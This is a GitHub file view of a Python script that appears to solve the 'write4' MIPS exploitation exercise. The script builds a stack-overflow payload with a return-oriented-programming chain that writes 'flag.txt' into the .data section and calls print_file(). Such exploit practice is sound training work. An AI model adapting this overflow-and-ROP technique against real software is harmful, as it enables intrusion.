-
Notifications
You must be signed in to change notification settings - Fork 3
/
write4-exploit.py
84 lines (64 loc) · 1.87 KB
/
write4-exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#!/usr/bin/python3
"""Exploit for write4 MIPS."""
import argparse
import pathlib
import struct
import sys
# ROP gadgets
'''
0x00400930 <+0>: lw t9,12(sp)
0x00400934 <+4>: lw t0,8(sp)
0x00400938 <+8>: lw t1,4(sp)
0x0040093c <+12>: sw t1,0(t0)
0x00400940 <+16>: jalr t9
0x00400944 <+20>: addi sp,sp,16
'''
WRITE4_GADGET = 0x400930
'''
0x00400948 <+24>: lw a0,8(sp)
0x0040094c <+28>: lw t9,4(sp)
0x00400950 <+32>: jalr t9
0x00400954 <+36>: nop
'''
PRINT_FILE_GADGET = 0x400948
# ELF sections
DATA_SECTION = 0x411550
# print_file() func call
PRINT_FILE = 0x400a90
def build_write4_gadget(addr, data):
"""Build a write4 gadget that can write to a specified address."""
if len(data) > 4:
raise ValueError('data is longer than 4 bytes')
buf = struct.pack('<I', WRITE4_GADGET)
buf += b'B' * 4
buf += data
buf += struct.pack('<I', addr)
return buf
def main(argv=sys.argv):
"""main."""
parser = argparse.ArgumentParser(
description='Exploit for write4 MIPS'
)
parser.add_argument(
'payload_file',
type=pathlib.Path,
default=pathlib.Path('payload.bin'),
nargs='?',
help='Path to write payload file to'
)
args = parser.parse_args()
buf = b'A' * 36
# write the string "cat flag.txt" to the .data section
buf += build_write4_gadget(DATA_SECTION, b'flag')
buf += build_write4_gadget(DATA_SECTION + 4, b'.txt')
buf += build_write4_gadget(DATA_SECTION + 8, b'\x00' * 4)
# populate registers for call to print_file()
buf += struct.pack('<I', PRINT_FILE_GADGET)
buf += b'C' * 4
buf += struct.pack('<I', PRINT_FILE)
buf += struct.pack('<I', DATA_SECTION)
with args.payload_file.open(mode='wb') as fobj:
fobj.write(buf)
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv))